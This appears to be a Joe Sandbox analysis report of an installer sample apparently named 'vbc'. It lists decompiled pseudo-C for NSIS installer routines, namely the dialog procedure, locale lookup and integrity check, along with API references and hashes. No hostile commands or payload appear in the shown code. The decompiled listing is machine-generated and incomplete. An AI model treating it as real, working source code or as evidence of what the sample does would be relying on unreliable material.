                    • String ID: C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp
                    • API String ID: 2295610775-2005183556
                    • Opcode ID: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
                    • Instruction ID: 4aa2ce40dd0fdaaf15299f79bbf0ddad0ee07bd1ec444a92f9406ee76b8f93c8
                    • Opcode Fuzzy Hash: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
                    • Instruction Fuzzy Hash: 3CD012365592205FC7402779AE0CC4B7A689F563313268B36B0EAF11F0CA74CC3296ED
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 86%
                    			E00403F77(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                    				struct HWND__* _v28;
                    				void* _v80;
                    				void* _v84;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t34;
                    				signed int _t36;
                    				signed int _t38;
                    				struct HWND__* _t48;
                    				signed int _t67;
                    				struct HWND__* _t73;
                    				signed int _t86;
                    				struct HWND__* _t91;
                    				signed int _t99;
                    				int _t103;
                    				signed int _t117;
                    				int _t118;
                    				int _t122;
                    				signed int _t124;
                    				struct HWND__* _t127;
                    				struct HWND__* _t128;
                    				int _t129;
                    				intOrPtr _t130;
                    				long _t133;
                    				int _t135;
                    				int _t136;
                    				void* _t137;
                    
                    				_t130 = _a8;
                    				if(_t130 == 0x110 || _t130 == 0x408) {
                    					_t34 = _a12;
                    					_t127 = _a4;
                    					__eflags = _t130 - 0x110;
                    					 *0x7a1f30 = _t34;
                    					if(_t130 == 0x110) {
                    						 *0x7a8a68 = _t127;
                    						 *0x7a1f44 = GetDlgItem(_t127, 1);
                    						_t91 = GetDlgItem(_t127, 2);
                    						_push(0xffffffff);
                    						_push(0x1c);
                    						 *0x79ff10 = _t91;
                    						E00404476(_t127);
                    						SetClassLongW(_t127, 0xfffffff2,  *0x7a7a48);
                    						 *0x7a7a2c = E0040140B(4);
                    						_t34 = 1;
                    						__eflags = 1;
                    						 *0x7a1f30 = 1;
                    					}
                    					_t124 =  *0x40a368; // 0x0
                    					_t136 = 0;
                    					_t133 = (_t124 << 6) +  *0x7a8a80;
                    					__eflags = _t124;
                    					if(_t124 < 0) {
                    						L36:
                    						E004044C2(0x40b);
                    						while(1) {
                    							_t36 =  *0x7a1f30;
                    							 *0x40a368 =  *0x40a368 + _t36;
                    							_t133 = _t133 + (_t36 << 6);
                    							_t38 =  *0x40a368; // 0x0
                    							__eflags = _t38 -  *0x7a8a84;
                    							if(_t38 ==  *0x7a8a84) {
                    								E0040140B(1);
                    							}
                    							__eflags =  *0x7a7a2c - _t136;
                    							if( *0x7a7a2c != _t136) {
                    								break;
                    							}
                    							__eflags =  *0x40a368 -  *0x7a8a84; // 0x0
                    							if(__eflags >= 0) {
                    								break;
                    							}
                    							_t117 =  *(_t133 + 0x14);
                    							E00406557(_t117, _t127, _t133, 0x7b8000,  *((intOrPtr*)(_t133 + 0x24)));
                    							_push( *((intOrPtr*)(_t133 + 0x20)));
                    							_push(0xfffffc19);
                    							E00404476(_t127);
                    							_push( *((intOrPtr*)(_t133 + 0x1c)));
                    							_push(0xfffffc1b);
                    							E00404476(_t127);
                    							_push( *((intOrPtr*)(_t133 + 0x28)));
                    							_push(0xfffffc1a);
                    							E00404476(_t127);
                    							_t48 = GetDlgItem(_t127, 3);
                    							__eflags =  *0x7a8aec - _t136;
                    							_v28 = _t48;
                    							if( *0x7a8aec != _t136) {
                    								_t117 = _t117 & 0x0000fefd | 0x00000004;
                    								__eflags = _t117;
                    							}
                    							ShowWindow(_t48, _t117 & 0x00000008); // executed
                    							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
                    							E00404498(_t117 & 0x00000002);
                    							_t118 = _t117 & 0x00000004;
                    							EnableWindow( *0x79ff10, _t118);
                    							__eflags = _t118 - _t136;
                    							if(_t118 == _t136) {
                    								_push(1);
                    							} else {
                    								_push(_t136);
                    							}
                    							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                    							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                    							__eflags =  *0x7a8aec - _t136;
                    							if( *0x7a8aec == _t136) {
                    								_push( *0x7a1f44);
                    							} else {
                    								SendMessageW(_t127, 0x401, 2, _t136);
                    								_push( *0x79ff10);
                    							}
                    							E004044AB();
                    							E0040651A(0x7a1f48, E00403F58());
                    							E00406557(0x7a1f48, _t127, _t133,  &(0x7a1f48[lstrlenW(0x7a1f48)]),  *((intOrPtr*)(_t133 + 0x18)));
                    							SetWindowTextW(_t127, 0x7a1f48); // executed
                    							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)), _t136);
                    							__eflags = _t67;
                    							if(_t67 != 0) {
                    								continue;
                    							} else {
                    								__eflags =  *_t133 - _t136;
                    								if( *_t133 == _t136) {
                    									continue;
                    								}
                    								__eflags =  *(_t133 + 4) - 5;
                    								if( *(_t133 + 4) != 5) {
                    									DestroyWindow( *0x7a7a38); // executed
                    									 *0x7a0f20 = _t133;
                    									__eflags =  *_t133 - _t136;
                    									if( *_t133 <= _t136) {
                    										goto L60;
                    									}
                    									_t73 = CreateDialogParamW( *0x7a8a60,  *_t133 +  *0x7a7a40 & 0x0000ffff, _t127,  *( *(_t133 + 4) * 4 + "5F@"), _t133); // executed
                    									__eflags = _t73 - _t136;
                    									 *0x7a7a38 = _t73;
                    									if(_t73 == _t136) {
                    										goto L60;
                    									}
                    									_push( *((intOrPtr*)(_t133 + 0x2c)));
                    									_push(6);
                    									E00404476(_t73);
                    									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                    									ScreenToClient(_t127, _t137 + 0x10);
                    									SetWindowPos( *0x7a7a38, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                    									E00401389( *((intOrPtr*)(_t133 + 0xc)), _t136);
                    									__eflags =  *0x7a7a2c - _t136;
                    									if( *0x7a7a2c != _t136) {
                    										goto L63;
                    									}
                    									ShowWindow( *0x7a7a38, 8); // executed
                    									E004044C2(0x405);
                    									goto L60;
                    								}
                    								__eflags =  *0x7a8aec - _t136;
                    								if( *0x7a8aec != _t136) {
                    									goto L63;
                    								}
                    								__eflags =  *0x7a8ae0 - _t136;
                    								if( *0x7a8ae0 != _t136) {
                    									continue;
                    								}
                    								goto L63;
                    							}
                    						}
                    						DestroyWindow( *0x7a7a38);
                    						 *0x7a8a68 = _t136;
                    						EndDialog(_t127,  *0x7a0718);
                    						goto L60;
                    					} else {
                    						__eflags = _t34 - 1;
                    						if(_t34 != 1) {
                    							L35:
                    							__eflags =  *_t133 - _t136;
                    							if( *_t133 == _t136) {
                    								goto L63;
                    							}
                    							goto L36;
                    						}
                    						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)), 0);
                    						__eflags = _t86;
                    						if(_t86 == 0) {
                    							goto L35;
                    						}
                    						SendMessageW( *0x7a7a38, 0x40f, 0, 1);
                    						__eflags =  *0x7a7a2c;
                    						return 0 |  *0x7a7a2c == 0x00000000;
                    					}
                    				} else {
                    					_t127 = _a4;
                    					_t136 = 0;
                    					if(_t130 == 0x47) {
                    						SetWindowPos( *0x7a1f28, _t127, 0, 0, 0, 0, 0x13);
                    					}
                    					_t122 = _a12;
                    					if(_t130 != 5) {
                    						L8:
                    						if(_t130 != 0x40d) {
                    							__eflags = _t130 - 0x11;
                    							if(_t130 != 0x11) {
                    								__eflags = _t130 - 0x111;
                    								if(_t130 != 0x111) {
                    									goto L28;
                    								}
                    								_t135 = _t122 & 0x0000ffff;
                    								_t128 = GetDlgItem(_t127, _t135);
                    								__eflags = _t128 - _t136;
                    								if(_t128 == _t136) {
                    									L15:
                    									__eflags = _t135 - 1;
                    									if(_t135 != 1) {
                    										__eflags = _t135 - 3;
                    										if(_t135 != 3) {
                    											_t129 = 2;
                    											__eflags = _t135 - _t129;
                    											if(_t135 != _t129) {
                    												L27:
                    												SendMessageW( *0x7a7a38, 0x111, _t122, _a16);
                    												goto L28;
                    											}
                    											__eflags =  *0x7a8aec - _t136;
                    											if( *0x7a8aec == _t136) {
                    												_t99 = E0040140B(3);
                    												__eflags = _t99;
                    												if(_t99 != 0) {
                    													goto L28;
                    												}
                    												 *0x7a0718 = 1;
                    												L23:
                    												_push(0x78);
                    												L24:
                    												E0040444F();
                    												goto L28;
                    											}
                    											E0040140B(_t129);
                    											 *0x7a0718 = _t129;
                    											goto L23;
                    										}
                    										__eflags =  *0x40a368 - _t136; // 0x0
                    										if(__eflags <= 0) {
                    											goto L27;
                    										}
                    										_push(0xffffffff);
                    										goto L24;
                    									}
                    									_push(_t135);
                    									goto L24;
                    								}
                    								SendMessageW(_t128, 0xf3, _t136, _t136);
                    								_t103 = IsWindowEnabled(_t128);
                    								__eflags = _t103;
                    								if(_t103 == 0) {
                    									L63:
                    									return 0;
                    								}
                    								goto L15;
                    							}
                    							SetWindowLongW(_t127, _t136, _t136);
                    							return 1;
                    						}
                    						DestroyWindow( *0x7a7a38);
                    						 *0x7a7a38 = _t122;
                    						L60:
                    						if( *0x7a3f48 == _t136 &&  *0x7a7a38 != _t136) {
                    							ShowWindow(_t127, 0xa); // executed
                    							 *0x7a3f48 = 1;
                    						}
                    						goto L63;
                    					} else {
                    						asm("sbb eax, eax");
                    						ShowWindow( *0x7a1f28,  ~(_t122 - 1) & 0x00000005);
                    						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                    							L28:
                    							return E004044DD(_a8, _t122, _a16);
                    						} else {
                    							ShowWindow(_t127, 4);
                    							goto L8;
                    						}
                    					}
                    				}
                    			}

                    0x0040403f
                    0x00000000
                    0x00000000
                    0x00404045
                    0x00404050
                    0x00404052
                    0x00404054
                    0x00404073
                    0x00404073
                    0x00404076
                    0x0040407b
                    0x0040407e
                    0x0040408e
                    0x0040408f
                    0x00404091
                    0x004040c7
                    0x004040d7
                    0x00000000
                    0x004040d7
                    0x00404093
                    0x00404099
                    0x004040b2
                    0x004040b7
                    0x004040b9
                    0x00000000
                    0x00000000
                    0x004040bb
                    0x004040a7
                    0x004040a7
                    0x004040a9
                    0x004040a9
                    0x00000000
                    0x004040a9
                    0x0040409c
                    0x004040a1
                    0x00000000
                    0x004040a1
                    0x00404080
                    0x00404086
                    0x00000000
                    0x00000000
                    0x00404088
                    0x00000000
                    0x00404088
                    0x00404078
                    0x00000000
                    0x00404078
                    0x0040405e
                    0x00404065
                    0x0040406b
                    0x0040406d
                    0x00404443
                    0x00000000
                    0x00404443
                    0x00000000
                    0x0040406d
                    0x0040402b
                    0x00000000
                    0x00404033
                    0x00404012
                    0x00404018
                    0x00404420
                    0x00404426
                    0x00404433
                    0x00404439
                    0x00404439
                    0x00000000
                    0x00403fc2
                    0x00403fc7
                    0x00403fd3
                    0x00403fdc
                    0x004040dd
                    0x00000000
                    0x00403ffb
                    0x00403ffe
                    0x00000000
                    0x00403ffe
                    0x00403fdc
                    0x00403fc0

                    APIs
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FB3
                    • ShowWindow.USER32(?), ref: 00403FD3
                    • GetWindowLongW.USER32(?,000000F0), ref: 00403FE5
                    • ShowWindow.USER32(?,00000004), ref: 00403FFE
                    • DestroyWindow.USER32 ref: 00404012
                    • SetWindowLongW.USER32 ref: 0040402B
                    • GetDlgItem.USER32(?,?), ref: 0040404A
                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0040405E
                    • IsWindowEnabled.USER32(00000000), ref: 00404065
                    • GetDlgItem.USER32(?,00000001), ref: 00404110
                    • GetDlgItem.USER32(?,00000002), ref: 0040411A
                    • SetClassLongW.USER32(?,000000F2,?), ref: 00404134
                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404185
                    • GetDlgItem.USER32(?,00000003), ref: 0040422B
                    • ShowWindow.USER32(00000000,?), ref: 0040424C
                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040425E
                    • EnableWindow.USER32(?,?), ref: 00404279
                    • GetSystemMenu.USER32 ref: 0040428F
                    • EnableMenuItem.USER32 ref: 00404296
                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042AE
                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042C1
                    • lstrlenW.KERNEL32(007A1F48,?,007A1F48,00000000), ref: 004042EB
                    • SetWindowTextW.USER32 ref: 004042FF
                    • ShowWindow.USER32(?,0000000A), ref: 00404433
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                    • String ID:
                    • API String ID: 121052019-0
                    • Opcode ID: 0031e1bd5cfe270ad991aee2cec6f31fffa44afcca6ec19933d696454b5d3b77
                    • Instruction ID: a523085d0bb4d20675d087507fe11aed99bae63dd77e7307ea40df4209393f8b
                    • Opcode Fuzzy Hash: 0031e1bd5cfe270ad991aee2cec6f31fffa44afcca6ec19933d696454b5d3b77
                    • Instruction Fuzzy Hash: 7FC1CEB1500604ABDB206F21ED85E2A3A69FBC6709F00853EF791B25E0CB3D5851DB6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    C-Code - Quality: 96%
                    			E00403BC9(void* __eflags) {
                    				intOrPtr _v4;
                    				intOrPtr _v8;
                    				int _v12;
                    				void _v16;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				intOrPtr* _t22;
                    				void* _t30;
                    				void* _t32;
                    				int _t33;
                    				void* _t36;
                    				int _t39;
                    				int _t40;
                    				int _t44;
                    				short _t63;
                    				WCHAR* _t65;
                    				signed char _t69;
                    				WCHAR* _t76;
                    				intOrPtr _t82;
                    				WCHAR* _t87;
                    
                    				_t82 =  *0x7a8a70;
                    				_t22 = E004068E7(2);
                    				_t90 = _t22;
                    				if(_t22 == 0) {
                    					_t76 = 0x7a1f48;
                    					L"1033" = 0x30;
                    					 *0x7b5002 = 0x78;
                    					 *0x7b5004 = 0;
                    					E004063E8(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x7a1f48, 0);
                    					__eflags =  *0x7a1f48;
                    					if(__eflags == 0) {
                    						E004063E8(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x7a1f48, 0);
                    					}
                    					lstrcatW(L"1033", _t76);
                    				} else {
                    					E00406461(L"1033",  *_t22() & 0x0000ffff);
                    				}
                    				E00403E9F(_t78, _t90);
                    				 *0x7a8ae0 =  *0x7a8a78 & 0x00000020;
                    				 *0x7a8afc = 0x10000;
                    				if(E00405EF1(_t90, 0x7b3800) != 0) {
                    					L16:
                    					if(E00405EF1(_t98, 0x7b3800) == 0) {
                    						E00406557(_t76, 0, _t82, 0x7b3800,  *((intOrPtr*)(_t82 + 0x118)));
                    					}
                    					_t30 = LoadImageW( *0x7a8a60, 0x67, 1, 0, 0, 0x8040);
                    					 *0x7a7a48 = _t30;
                    					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                    						L21:
                    						if(E0040140B(0) == 0) {
                    							_t32 = E00403E9F(_t78, __eflags);
                    							__eflags =  *0x7a8b00;
                    							if( *0x7a8b00 != 0) {
                    								_t33 = E0040564F(_t32, 0);
                    								__eflags = _t33;
                    								if(_t33 == 0) {
                    									E0040140B(1);
                    									goto L33;
                    								}
                    								__eflags =  *0x7a7a2c;
                    								if( *0x7a7a2c == 0) {
                    									E0040140B(2);
                    								}
                    								goto L22;
                    							}
                    							ShowWindow( *0x7a1f28, 5); // executed
                    							_t39 = E00406877("RichEd20"); // executed
                    							__eflags = _t39;
                    							if(_t39 == 0) {
                    								E00406877("RichEd32");
                    							}
                    							_t87 = L"RichEdit20W";
                    							_t40 = GetClassInfoW(0, _t87, 0x7a7a00);
                    							__eflags = _t40;
                    							if(_t40 == 0) {
                    								GetClassInfoW(0, L"RichEdit", 0x7a7a00);
                    								 *0x7a7a24 = _t87;
                    								RegisterClassW(0x7a7a00);
                    							}
                    							_t44 = DialogBoxParamW( *0x7a8a60,  *0x7a7a40 + 0x00000069 & 0x0000ffff, 0, E00403F77, 0); // executed
                    							E00403B19(E0040140B(5), 1);
                    							return _t44;
                    						}
                    						L22:
                    						_t36 = 2;
                    						return _t36;
                    					} else {
                    						_t78 =  *0x7a8a60;
                    						 *0x7a7a04 = E00401000;
                    						 *0x7a7a10 =  *0x7a8a60;
                    						 *0x7a7a14 = _t30;
                    						 *0x7a7a24 = 0x40a380;
                    						if(RegisterClassW(0x7a7a00) == 0) {
                    							L33:
                    							__eflags = 0;
                    							return 0;
                    						}
                    						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                    						 *0x7a1f28 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a8a60, 0);
                    						goto L21;
                    					}
                    				} else {
                    					_t78 =  *(_t82 + 0x48);
                    					_t92 = _t78;
                    					if(_t78 == 0) {
                    						goto L16;
                    					}
                    					_t76 = 0x7a6a00;
                    					E004063E8(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x7a8a98 + _t78 * 2,  *0x7a8a98 +  *(_t82 + 0x4c) * 2, 0x7a6a00, 0);
                    					_t63 =  *0x7a6a00; // 0x43
                    					if(_t63 == 0) {
                    						goto L16;
                    					}
                    					if(_t63 == 0x22) {
                    						_t76 = 0x7a6a02;
                    						 *((short*)(E00405E16(0x7a6a02, 0x22))) = 0;
                    					}
                    					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                    					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                    						L15:
                    						E0040651A(0x7b3800, E00405DE9(_t76));
                    						goto L16;
                    					} else {
                    						_t69 = GetFileAttributesW(_t76);
                    						if(_t69 == 0xffffffff) {
                    							L14:
                    							E00405E35(_t76);
                    							goto L15;
                    						}
                    						_t98 = _t69 & 0x00000010;
                    						if((_t69 & 0x00000010) != 0) {
                    							goto L15;
                    						}
                    						goto L14;
                    					}
                    				}
                    			}

                    APIs
                      • Part of subcall function 004068E7: GetModuleHandleA.KERNEL32(?,00000020,?,0040361A,0000000B), ref: 004068F9
                      • Part of subcall function 004068E7: GetProcAddress.KERNEL32(00000000,?), ref: 00406914
                    • lstrcatW.KERNEL32 ref: 00403C4A
                    • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,007B3800,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000,00000002,7556D4C4), ref: 00403CCA
                    • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,007B3800,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000), ref: 00403CDD
                    • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403CE8
                    • LoadImageW.USER32 ref: 00403D31
                      • Part of subcall function 00406461: wsprintfW.USER32 ref: 0040646E
                    • RegisterClassW.USER32 ref: 00403D6E
                    • SystemParametersInfoW.USER32 ref: 00403D86
                    • CreateWindowExW.USER32 ref: 00403DBB
                    • ShowWindow.USER32(00000005,00000000), ref: 00403DF1
                    • GetClassInfoW.USER32 ref: 00403E1D
                    • GetClassInfoW.USER32 ref: 00403E2A
                    • RegisterClassW.USER32 ref: 00403E33
                    • DialogBoxParamW.USER32 ref: 00403E52
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                    • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                    • API String ID: 1975747703-2633365883
                    • Opcode ID: 1166395d184842cca1f9c9dbf690e44f16c4877d7fe222633aad620317193a3c
                    • Instruction ID: 5e1ff83f83eb9308ce16c84110d2fcc5f4f6a1078aae304d5a5647478e66a4f2
                    • Opcode Fuzzy Hash: 1166395d184842cca1f9c9dbf690e44f16c4877d7fe222633aad620317193a3c
                    • Instruction Fuzzy Hash: 0661A270240700BAD320AB669D45F2B3A6CEBC5B49F40853FF942B26E1DB7D9901CB6D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    C-Code - Quality: 80%
                    			E0040307D(void* __eflags, signed int _a4) {
                    				DWORD* _v8;
                    				DWORD* _v12;
                    				void* _v16;
                    				intOrPtr _v20;
                    				char _v24;
                    				intOrPtr _v28;
                    				intOrPtr _v32;
                    				intOrPtr _v36;
                    				intOrPtr _v40;
                    				signed int _v44;
                    				signed int _t50;
                    				void* _t53;
                    				void* _t57;
                    				intOrPtr* _t59;
                    				long _t60;
                    				signed int _t65;
                    				signed int _t70;
                    				signed int _t71;
                    				signed int _t77;
                    				intOrPtr _t80;
                    				long _t82;
                    				signed int _t85;
                    				signed int _t87;
                    				void* _t89;
                    				signed int _t90;
                    				signed int _t93;
                    				void* _t94;
                    
                    				_t82 = 0;
                    				_v12 = 0;
                    				_v8 = 0;
                    				 *0x7a8a6c = GetTickCount() + 0x3e8;
                    				GetModuleFileNameW(0, 0x7b6800, 0x400);
                    				_t89 = E0040600A(0x7b6800, 0x80000000, 3);
                    				_v16 = _t89;
                    				 *0x40a018 = _t89;
                    				if(_t89 == 0xffffffff) {
                    					return L"Error launching installer";
                    				}
                    				E0040651A(0x7b4800, 0x7b6800);
                    				E0040651A(0x7b7000, E00405E35(0x7b4800));
                    				_t50 = GetFileSize(_t89, 0);
                    				__eflags = _t50;
                    				 *0x79f704 = _t50;
                    				_t93 = _t50;
                    				if(_t50 <= 0) {
                    					L24:
                    					E00403019(1);
                    					__eflags =  *0x7a8a74 - _t82;
                    					if( *0x7a8a74 == _t82) {
                    						goto L29;
                    					}
                    					__eflags = _v8 - _t82;
                    					if(_v8 == _t82) {
                    						L28:
                    						_t34 =  &_v24; // 0x40385a
                    						_t53 = GlobalAlloc(0x40,  *_t34); // executed
                    						_t94 = _t53;
                    						E004034C2( *0x7a8a74 + 0x1c);
                    						_t35 =  &_v24; // 0x40385a
                    						_push( *_t35);
                    						_push(_t94);
                    						_push(_t82);
                    						_push(0xffffffff); // executed
                    						_t57 = E004032B4(); // executed
                    						__eflags = _t57 - _v24;
                    						if(_t57 == _v24) {
                    							__eflags = _v44 & 0x00000001;
                    							 *0x7a8a70 = _t94;
                    							 *0x7a8a78 =  *_t94;
                    							if((_v44 & 0x00000001) != 0) {
                    								 *0x7a8a7c =  *0x7a8a7c + 1;
                    								__eflags =  *0x7a8a7c;
                    							}
                    							_t40 = _t94 + 0x44; // 0x44
                    							_t59 = _t40;
                    							_t85 = 8;
                    							do {
                    								_t59 = _t59 - 8;
                    								 *_t59 =  *_t59 + _t94;
                    								_t85 = _t85 - 1;
                    								__eflags = _t85;
                    							} while (_t85 != 0);
                    							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                    							 *(_t94 + 0x3c) = _t60;
                    							E00405FC5(0x7a8a80, _t94 + 4, 0x40);
                    							__eflags = 0;
                    							return 0;
                    						}
                    						goto L29;
                    					}
                    					E004034C2( *0x7936f8);
                    					_t65 = E004034AC( &_a4, 4);
                    					__eflags = _t65;
                    					if(_t65 == 0) {
                    						goto L29;
                    					}
                    					__eflags = _v12 - _a4;
                    					if(_v12 != _a4) {
                    						goto L29;
                    					}
                    					goto L28;
                    				} else {
                    					do {
                    						_t90 = _t93;
                    						asm("sbb eax, eax");
                    						_t70 = ( ~( *0x7a8a74) & 0x00007e00) + 0x200;
                    						__eflags = _t93 - _t70;
                    						if(_t93 >= _t70) {
                    							_t90 = _t70;
                    						}
                    						_t71 = E004034AC(0x78b6f8, _t90);
                    						__eflags = _t71;
                    						if(_t71 == 0) {
                    							E00403019(1);
                    							L29:
                    							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                    						}
                    						__eflags =  *0x7a8a74;
                    						if( *0x7a8a74 != 0) {
                    							__eflags = _a4 & 0x00000002;
                    							if((_a4 & 0x00000002) == 0) {
                    								E00403019(0);
                    							}
                    							goto L20;
                    						}
                    						E00405FC5( &_v44, 0x78b6f8, 0x1c);
                    						_t77 = _v44;
                    						__eflags = _t77 & 0xfffffff0;
                    						if((_t77 & 0xfffffff0) != 0) {
                    							goto L20;
                    						}
                    						__eflags = _v40 - 0xdeadbeef;
                    						if(_v40 != 0xdeadbeef) {
                    							goto L20;
                    						}
                    						__eflags = _v28 - 0x74736e49;
                    						if(_v28 != 0x74736e49) {
                    							goto L20;
                    						}
                    						__eflags = _v32 - 0x74666f73;
                    						if(_v32 != 0x74666f73) {
                    							goto L20;
                    						}
                    						__eflags = _v36 - 0x6c6c754e;
                    						if(_v36 != 0x6c6c754e) {
                    							goto L20;
                    						}
                    						_a4 = _a4 | _t77;
                    						_t87 =  *0x7936f8; // 0x4fcbb
                    						 *0x7a8b00 =  *0x7a8b00 | _a4 & 0x00000002;
                    						_t80 = _v20;
                    						__eflags = _t80 - _t93;
                    						 *0x7a8a74 = _t87;
                    						if(_t80 > _t93) {
                    							goto L29;
                    						}
                    						__eflags = _a4 & 0x00000008;
                    						if((_a4 & 0x00000008) != 0) {
                    							L16:
                    							_v8 = _v8 + 1;
                    							_t93 = _t80 - 4;
                    							__eflags = _t90 - _t93;
                    							if(_t90 > _t93) {
                    								_t90 = _t93;
                    							}
                    							goto L20;
                    						}
                    						__eflags = _a4 & 0x00000004;
                    						if((_a4 & 0x00000004) != 0) {
                    							break;
                    						}
                    						goto L16;
                    						L20:
                    						__eflags = _t93 -  *0x79f704; // 0x4fcbf
                    						if(__eflags < 0) {
                    							_v12 = E004069D4(_v12, 0x78b6f8, _t90);
                    						}
                    						 *0x7936f8 =  *0x7936f8 + _t90;
                    						_t93 = _t93 - _t90;
                    						__eflags = _t93;
                    					} while (_t93 != 0);
                    					_t82 = 0;
                    					__eflags = 0;
                    					goto L24;
                    				}
                    			}

                    0x00403085
                    0x00403088
                    0x0040308b
                    0x004030a5
                    0x004030aa
                    0x004030bd
                    0x004030c2
                    0x004030c5
                    0x004030cb
                    0x00000000
                    0x004030cd
                    0x004030de
                    0x004030ef
                    0x004030f6
                    0x004030fc
                    0x004030fe
                    0x00403103
                    0x00403105
                    0x004031f0
                    0x004031f2
                    0x004031f7
                    0x004031fe
                    0x00000000
